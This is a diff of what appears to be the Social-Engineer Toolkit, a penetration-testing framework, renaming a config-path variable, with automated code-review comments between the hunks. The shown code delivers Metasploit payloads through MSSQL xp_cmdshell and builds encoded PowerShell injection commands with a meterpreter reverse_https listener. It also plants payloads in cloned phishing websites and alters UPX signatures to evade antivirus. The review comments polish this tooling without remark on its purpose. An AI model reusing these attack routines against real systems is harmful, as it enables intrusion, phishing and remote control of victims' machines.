data = fileopen.read() data = fileopen.read()
@ -830,7 +830,7 @@ def upx(path_to_file):
filewrite.write(data.replace("UPX", random_string, 4)) filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close() filewrite.close()
# copy the file over # copy the file over
subprocess.Popen("mv %s/temp.binary %s" % (setdir, path_to_file), subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
time.sleep(3) time.sleep(3)
@ -873,13 +873,13 @@ def show_banner(define_version, graphic):
version = "" version = ""
def pull_version(): def pull_version():
if not os.path.isfile(setdir + "/version.lock"): if not os.path.isfile(userconfigpath + "version.lock"):
try: try:
url = ( url = (
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version') 'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
version = urlopen(url).read().rstrip().decode('utf-8') version = urlopen(url).read().rstrip().decode('utf-8')
filewrite = open(setdir + "/version.lock", "w") filewrite = open(userconfigpath + "version.lock", "w")
filewrite.write(version) filewrite.write(version)
filewrite.close() filewrite.close()
@ -887,7 +887,7 @@ def show_banner(define_version, graphic):
version = "keyboard interrupt" version = "keyboard interrupt"
else: else:
version = open(setdir + "/version.lock", "r").read() version = open(userconfigpath + "version.lock", "r").read()
if cv != version: if cv != version:
if version != "": if version != "":
@ -1414,8 +1414,8 @@ def copyfolder(sourcePath, destPath):
def check_options(option): def check_options(option):
# open the directory # open the directory
trigger = 0 trigger = 0
if os.path.isfile(setdir + "/set.options"): if os.path.isfile(userconfigpath + "set.options"):
fileopen = open(setdir + "/set.options", "r").readlines() fileopen = open(userconfigpath + "set.options", "r").readlines()
for line in fileopen: for line in fileopen:
match = re.search(option, line) match = re.search(option, line)
if match: if match:
@ -1433,13 +1433,13 @@ def check_options(option):
def update_options(option): def update_options(option):
# if the file isn't there write a blank file # if the file isn't there write a blank file
if not os.path.isfile(setdir + "/set.options"): if not os.path.isfile(userconfigpath + "set.options"):
filewrite = open(setdir + "/set.options", "w") filewrite = open(userconfigpath + "set.options", "w")
filewrite.write("") filewrite.write("")
filewrite.close() filewrite.close()
# remove old options # remove old options
fileopen = open(setdir + "/set.options", "r") fileopen = open(userconfigpath + "set.options", "r")
old_options = "" old_options = ""
for line in fileopen: for line in fileopen:
match = re.search(option, line) match = re.search(option, line)
@ -1447,7 +1447,7 @@ def update_options(option):
line = "" line = ""
old_options = old_options + line old_options = old_options + line
# append to file # append to file
filewrite = open(setdir + "/set.options", "w") filewrite = open(userconfigpath + "set.options", "w")
filewrite.write(old_options + "\n" + option + "\n") filewrite.write(old_options + "\n" + option + "\n")
filewrite.close() filewrite.close()
@ -1771,7 +1771,7 @@ def setdir():
return "src/program_junk/" return "src/program_junk/"
# set the main directory for SET # set the main directory for SET
setdir = setdir() userconfigpath = setdir()
# Copyright (c) 2007 Brandon Sterne # Copyright (c) 2007 Brandon Sterne
# Licensed under the MIT license. # Licensed under the MIT license.
@ -2025,7 +2025,7 @@ def input(string):
def fetch_template(): def fetch_template():
fileopen = open(setdir + "/site.template").readlines() fileopen = open(userconfigpath + "site.template").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("URL=", line) match = re.search("URL=", line)
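Review bot: In `site_cloner` (hunk @ -586) `userconfigpath` is interpolated unquoted into a `shell=True` command, `cp %s/web_clone/* '%s'`, while `exportpath` on the same line is quoted, so a config directory containing whitespace splits the command; quoting it the same way, `cp '%s/web_clone/'* '%s'`, is the minimal fix, and a `shutil`-based copy would avoid the shell entirely, the same applying to `java_applet_attack` (@ -666, @ -675) and `upx` (@ -811, @ -830). The `teensy_pde_generator` status strings (@ -700, @ -750) keep the `"%s/reports/..." % (userconfigpath)` form, which now prints a doubled slash because the visible return of `setdir()` ends in `/`; `os.path.join(userconfigpath, "reports", "beef.ino")` keeps path and message consistent. The trailing-separator assumption behind every `userconfigpath + "site.template"` is established only at `userconfigpath = setdir()` (hunk @ -1771), so a comment there, `# must end with a path separator: callers concatenate file names directly`, would make the invariant explicit. `cleanup_routine` (@ -463, @ -476) still ends in a bare `except: pass`, which also hides a failure to restore `Signed_Update.jar`; narrowing it to `except (IOError, OSError) as error:` and logging `error` keeps the best-effort cleanup without losing the signal.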


@ -8,7 +8,7 @@ from src.core.setcore import *
import subprocess import subprocess
import os import os
definepath = os.getcwd() definepath = os.getcwd()
os.chdir(setdir) os.chdir(userconfigpath)
# create the directories for us # create the directories for us
subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait() subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait()
# move into CA directory # move into CA directory
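Review bot: `os.chdir(userconfigpath)` right before `subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True)` changes the process-wide working directory and shells out for directory creation that `os.makedirs` does natively; if `userconfigpath` does not exist yet the `chdir` raises before anything is created, and on a repeat run `mkdir CA` fails on the existing directory while the `;`-chained commands still run, so the failure is invisible. The following comment (`# move into CA directory`) suggests the rest of the script depends on the changed cwd, so the `chdir` may have to stay, but the three `mkdir`s could become `for d in ("newcerts", "private"): os.makedirs(os.path.join(userconfigpath, "CA", d))` guarded by an `os.path.isdir` check, which needs no shell. The script continues outside the hunk.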


@ -45,7 +45,7 @@ def launch():
# try/catch block # try/catch block
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'),
os.path.join(core.setdir + "autopwn.answer"))) os.path.join(core.userconfigpath, "autopwn.answer")))
child.interact() child.interact()
# handle exceptions and log them # handle exceptions and log them
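Review bot: `os.path.join(core.meta_path + 'msfconsole')` on the line above the changed one is left as a single-argument join, so it adds no separator, and `core.meta_path` is referenced without the call parentheses that the other call sites in this PR use (`core.meta_path()`); if `meta_path` is a function this concatenation raises TypeError inside the `try` and the spawn never happens — I cannot see `meta_path`'s definition from here, so please confirm. Suggest `os.path.join(core.meta_path(), 'msfconsole')`, matching the two-argument form the commit just introduced for the second argument. `launch` begins before the hunk.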


@ -178,21 +178,21 @@ def deploy_hex2binary(ipaddr, port, username, password):
# if we are using a SET interactive shell payload then we need to make # if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set # the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")): if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
web_path = os.path.join(core.setdir + "web_clone") web_path = os.path.join(core.userconfigpath, "web_clone")
# then we are using metasploit # then we are using metasploit
else: else:
if operating_system == "posix": if operating_system == "posix":
web_path = core.setdir web_path = core.userconfigpath
# if it isn't there yet # if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"): if not os.path.isfile(core.userconfigpath + "1msf.exe"):
# move it then # move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait() (core.userconfigpath, core.userconfigpath), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait() (core.userconfigpath, core.userconfigpath), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait() (core.userconfigpath, core.userconfigpath), shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe") payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen: with open(payload_filename, "rb") as fileopen:
@ -202,12 +202,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
data = binascii.hexlify(data) data = binascii.hexlify(data)
# we write out binary out to a file # we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "payload.hex"), "w") as filewrite:
filewrite.write(data) filewrite.write(data)
if choice1 == "1": if choice1 == "1":
# if we are using metasploit, start the listener # if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if not os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
if operating_system == "posix": if operating_system == "posix":
try: try:
core.module_reload(pexpect) core.module_reload(pexpect)
@ -216,7 +216,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path() msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config"))) os.path.join(core.userconfigpath, "meta_config")))
# random executable name # random executable name
random_exe = core.generate_random_string(10, 15) random_exe = core.generate_random_string(10, 15)
@ -240,9 +240,9 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
#with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: #with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite = file(core.setdir + "/payload_options.shellcode", "w") filewrite = file(core.userconfigpath + "payload_options.shellcode", "w")
filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
filewrite.close() filewrite.close()
@ -253,21 +253,21 @@ def deploy_hex2binary(ipaddr, port, username, password):
# launch powershell # launch powershell
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell")) os.makedirs(os.path.join(core.userconfigpath, "reports/powershell"))
x86 = file(core.setdir + "x86.powershell").read().rstrip() x86 = file(core.userconfigpath + "x86.powershell").read().rstrip()
x86 = core.powershell_encodedcommand(x86) x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, " core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) "they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
filewrite.close() filewrite.close()
# if our payload is x86 based - need to prep msfconsole rc # if our payload is x86 based - need to prep msfconsole rc
if payload == "x86": if payload == "x86":
powershell_command = x86 powershell_command = x86
filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w") filewrite = open(core.userconfigpath + "reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n" "set lport {0}\n"
@ -289,7 +289,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc"))) os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metasploit takes a little bit to start...") core.print_status("Be patient, Metasploit takes a little bit to start...")
#child2.expect("Starting the payload handler", timeout=30000) #child2.expect("Starting the payload handler", timeout=30000)
@ -309,8 +309,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
# here we start the conversion and execute the payload # here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.") core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time # read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen: #with open(os.path.join(core.userconfigpath, 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r") fileopen = open(core.userconfigpath + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...") core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
while fileopen: while fileopen:
@ -335,10 +335,10 @@ def deploy_hex2binary(ipaddr, port, username, password):
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload # if we are using SET payload
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")): if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
core.print_status("Spawning separate child process for listener...") core.print_status("Spawning separate child process for listener...")
try: try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) shutil.copyfile(os.path.join(core.userconfigpath, "web_clone/x"), definepath)
except: except:
pass pass
@ -376,8 +376,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "2": if option == "2":
core.print_status("Triggering payload stager...") core.print_status("Triggering payload stager...")
alphainject = "" alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): if os.path.isfile(os.path.join(core.userconfigpath, "meterpreter.alpha")):
with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: with open(os.path.join(core.userconfigpath, "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read() alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
@ -387,7 +387,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
# if pexpect doesnt exit right then it freaks out # if pexpect doesnt exit right then it freaks out
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")): if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py") os.system("python ../../payloads/set_payloads/listener.py")
try: try:
# interact with the child process through pexpect # interact with the child process through pexpect
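Review bot: `payload_filename = os.path.join(web_path + "1msf.exe")` (context line just after the changed block at the top of this section) is a single-argument join, so it concatenates without a separator; with `web_path = os.path.join(core.userconfigpath, "web_clone")`, which has no trailing slash, the set.payload branch resolves to `<userconfigpath>/web_clone1msf.exe` and the `open(payload_filename, "rb")` that follows fails (this was already the case before the rename) — it should be `payload_filename = os.path.join(web_path, "1msf.exe")`. The lines that still build paths with `+` (`core.userconfigpath + "1msf.exe"`, `"payload_options.shellcode"`, `"x86.powershell"`, `'payload.hex'` and the `reports/powershell/...` writes here, plus the equivalent lines in the powershell-injection and web-server sections below) only work if `core.userconfigpath` keeps a trailing separator, while the `os.path.join(core.userconfigpath, ...)` lines work either way; the section would be safer on one form. Separately, `shutil.copyfile(os.path.join(core.userconfigpath, "web_clone/x"), definepath)` copies onto what appears to be a directory path and is silenced by a bare `except: pass`, so a failure there is never surfaced. `deploy_hex2binary` starts and ends outside the visible hunks.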


@ -68,7 +68,7 @@ try:
if port == "": if port == "":
port = "443" port = "443"
core.update_options("PORT={0}".format(port)) core.update_options("PORT={0}".format(port))
with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite.write("{0} {1},".format(payload, port)) filewrite.write("{0} {1},".format(payload, port))
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
@ -80,20 +80,20 @@ try:
import src.payloads.powershell.prep import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell")) os.makedirs(os.path.join(core.userconfigpath, "reports/powershell"))
x86 = open(core.setdir + "x86.powershell", "r").read() x86 = open(core.userconfigpath + "x86.powershell", "r").read()
x86 = core.powershell_encodedcommand(x86) x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
filewrite.close() filewrite.close()
payload = "windows/meterpreter/reverse_https\n" # if we are using x86 payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack # write out our answer file for the powershell injection attack
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n" "set LPORT {0}\n"
@ -113,7 +113,7 @@ try:
# launch metasploit below # launch metasploit below
core.print_status("Launching Metasploit.. This may take a few seconds.") core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc")), os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait() shell=True).wait()
# handle exceptions # handle exceptions
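Review bot: `x86 = open(core.userconfigpath + "x86.powershell", "r").read()` leaks its file handle, and `filewrite = file(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w")` uses the Python 2-only `file` builtin, while the hunks immediately above and below this block already use `with open(...)`. Suggest `with open(os.path.join(core.userconfigpath, "x86.powershell")) as fileopen: x86 = fileopen.read()` and the same `with open(os.path.join(core.userconfigpath, "reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:` form for the write, which also removes the dependence on a trailing separator in `core.userconfigpath`. The enclosing `try` begins before the first hunk.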


@ -48,7 +48,7 @@ Next
'''.format(sms_server, package_id) '''.format(sms_server, package_id)
# write out the file to reports # write out the file to reports
with open(os.path.join(core.setdir + "reports/sccm_configuration.txt"), 'w') as filewrite: with open(os.path.join(core.userconfigpath, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration) filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.") core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.") core.print_status("You need to copy the script to the startup folder of the server.")
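Review bot: The write to `os.path.join(core.userconfigpath, "reports/sccm_configuration.txt")` assumes the `reports` directory already exists; the powershell sections in this PR guard their `reports/powershell` writes with an `os.path.isdir`/`os.makedirs` pair, and nothing visible here does the same for `reports`, so a fresh config directory would make the `open` fail. Consider `reports = os.path.join(core.userconfigpath, "reports")` followed by `if not os.path.isdir(reports): os.makedirs(reports)` before the `with open`. The enclosing code starts before the hunk.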


@ -7,4 +7,4 @@ definepath = os.getcwd()
sys.path.append(definepath) sys.path.append(definepath)
import src.core.setcore as core import src.core.setcore as core
core.start_web_server_unthreaded(os.path.join(core.setdir, "web_clone")) core.start_web_server_unthreaded(os.path.join(core.userconfigpath, "web_clone"))


@ -29,8 +29,8 @@ if check_options("CUSTOM_EXE="):
custom = 1 custom = 1
if not "CMD/MULTI" in check_options("CUSTOM_EXE="): if not "CMD/MULTI" in check_options("CUSTOM_EXE="):
# here we need to modify the java applet to recognize custom attribute # here we need to modify the java applet to recognize custom attribute
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read() data = fileopen3.read()
# we randomize param name so static sigs cant be used # we randomize param name so static sigs cant be used
@ -39,7 +39,7 @@ if check_options("CUSTOM_EXE="):
'param name="8" value="%s"' % (goat_random)) 'param name="8" value="%s"' % (goat_random))
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), shell=True).wait() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait()
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.") print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.") print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
@ -68,8 +68,8 @@ msf_path = ""
# see if we are using setshell # see if we are using setshell
set_payload = "" set_payload = ""
if os.path.isfile(setdir + "/set.payload"): if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(setdir + "/set.payload", "r") fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen: for line in fileopen:
set_payload = line.rstrip() set_payload = line.rstrip()
@ -97,8 +97,8 @@ def web_server_start():
web_port = check_config("WEB_PORT=") web_port = check_config("WEB_PORT=")
# see if exploit requires webdav # see if exploit requires webdav
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(setdir + "/meta_config", "r") fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("set SRVPORT 80", line) match = re.search("set SRVPORT 80", line)
@ -114,8 +114,8 @@ def web_server_start():
ipaddr = input("Enter your ipaddress: ") ipaddr = input("Enter your ipaddress: ")
# Grab custom or set defined # Grab custom or set defined
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("TEMPLATE=", line) match = re.search("TEMPLATE=", line)
@ -124,13 +124,13 @@ def web_server_start():
template = line[1] template = line[1]
# grab web attack selection # grab web attack selection
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector", "r").readlines() fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
# if it doesn't exist just set a default template # if it doesn't exist just set a default template
if not os.path.isfile(setdir + "/attack_vector"): if not os.path.isfile(userconfigpath + "attack_vector"):
attack_vector = "nada" attack_vector = "nada"
# Sticking it to A/V below # Sticking it to A/V below
@ -145,14 +145,14 @@ def web_server_start():
# check multiattack flags here # check multiattack flags here
multiattack_harv = "off" multiattack_harv = "off"
if os.path.isfile(setdir + "/multi_harvester"): if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack_harv = "on" multiattack_harv = "on"
if os.path.isfile(setdir + "/multi_tabnabbing"): if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack_harv = "on" multiattack_harv = "on"
# open our config file that was specified in SET # open our config file that was specified in SET
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here # start loop here
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
@ -164,7 +164,7 @@ def web_server_start():
url = line[1].rstrip() url = line[1].rstrip()
# if we didn't create template then do self # if we didn't create template then do self
if not os.path.isfile(setdir + "/site.template"): if not os.path.isfile(userconfigpath + "site.template"):
template = "SELF" template = "SELF"
# If SET is setting up the website for you, get the website ready for # If SET is setting up the website for you, get the website ready for
@ -224,38 +224,38 @@ def web_server_start():
if attack_vector != 'hijacking': if attack_vector != 'hijacking':
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC) print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
# copy all the files needed # copy all the files needed
if not os.path.isfile(setdir + "/" + applet_name): if not os.path.isfile(userconfigpath + "" + applet_name):
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath), "%s/%s" % (setdir, applet_name)) (definepath), "%s/%s" % (userconfigpath, applet_name))
shutil.copyfile(setdir + "/%s" % (applet_name), shutil.copyfile(userconfigpath + "%s" % (applet_name),
"%s/web_clone/%s" % (setdir, applet_name)) "%s/web_clone/%s" % (userconfigpath, applet_name))
if os.path.isfile("%s/src/html/nix.bin" % (definepath)): if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
nix = check_options("NIX.BIN=") nix = check_options("NIX.BIN=")
shutil.copyfile("%s/src/html/nix.bin" % shutil.copyfile("%s/src/html/nix.bin" %
(definepath), "%s/web_clone/%s" % (setdir, nix)) (definepath), "%s/web_clone/%s" % (userconfigpath, nix))
if os.path.isfile("%s/src/html/mac.bin" % (definepath)): if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=") mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath), shutil.copyfile("%s/src/html/mac.bin" % (definepath),
"%s/web_clone/%s" % (setdir, definepath, mac)) "%s/web_clone/%s" % (userconfigpath, definepath, mac))
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
win = check_options("MSF.EXE=") win = check_options("MSF.EXE=")
shutil.copyfile(setdir + "/msf.exe", shutil.copyfile(userconfigpath + "msf.exe",
"%s/web_clone/%s" % (setdir, win)) "%s/web_clone/%s" % (userconfigpath, win))
# pull random name generation # pull random name generation
print_status( print_status(
"The site has been moved. SET Web Server is now listening..") "The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=") rand_gen = check_options("MSF_EXE=")
if rand_gen != 0: if rand_gen != 0:
if os.path.isfile(setdir + "/custom.exe"): if os.path.isfile(userconfigpath + "custom.exe"):
shutil.copyfile(setdir + "/msf.exe", shutil.copyfile(userconfigpath + "msf.exe",
setdir + "/web_clone/msf.exe") userconfigpath + "web_clone/msf.exe")
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now") print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(setdir + "/web_clone/msf.exe", shutil.copyfile(userconfigpath + "web_clone/msf.exe",
setdir + "/web_clone/%s" % (rand_gen)) userconfigpath + "web_clone/%s" % (rand_gen))
# if docbase exploit do some funky stuff to get it to work right # if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(setdir + "/docbase.file"): if os.path.isfile(userconfigpath + "docbase.file"):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd"> "http://www.w3.org/TR/html4/frameset.dtd">
<HTML> <HTML>
@ -267,11 +267,11 @@ def web_server_start():
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
</FRAMESET> </FRAMESET>
</HTML>""" % (ipaddr)) </HTML>""" % (ipaddr))
if os.path.isfile(setdir + "/web_clone/site.html"): if os.path.isfile(userconfigpath + "web_clone/site.html"):
os.remove(setdir + "/web_clone/site.html") os.remove(userconfigpath + "web_clone/site.html")
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
setdir + "/web_clone/site.html") userconfigpath + "web_clone/site.html")
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(docbase) filewrite.write(docbase)
filewrite.close() filewrite.close()
@ -288,7 +288,7 @@ def web_server_start():
import src.core.webserver as webserver import src.core.webserver as webserver
# specify the path for the SET web directories for the applet # specify the path for the SET web directories for the applet
# attack # attack
path = (setdir + "/web_clone/") path = (userconfigpath + "web_clone/")
try: try:
import multiprocessing import multiprocessing
p = multiprocessing.Process( p = multiprocessing.Process(
@ -320,7 +320,7 @@ def web_server_start():
import src.core.webserver as webserver import src.core.webserver as webserver
# specify the path for the SET web directories for the # specify the path for the SET web directories for the
# applet attack # applet attack
path = (setdir + "/web_clone/") path = (userconfigpath + "web_clone/")
p = multiprocessing.Process( p = multiprocessing.Process(
target=webserver.start_server, args=(web_port, path)) target=webserver.start_server, args=(web_port, path))
p.start() p.start()
@ -350,7 +350,7 @@ def web_server_start():
if apache == 1: if apache == 1:
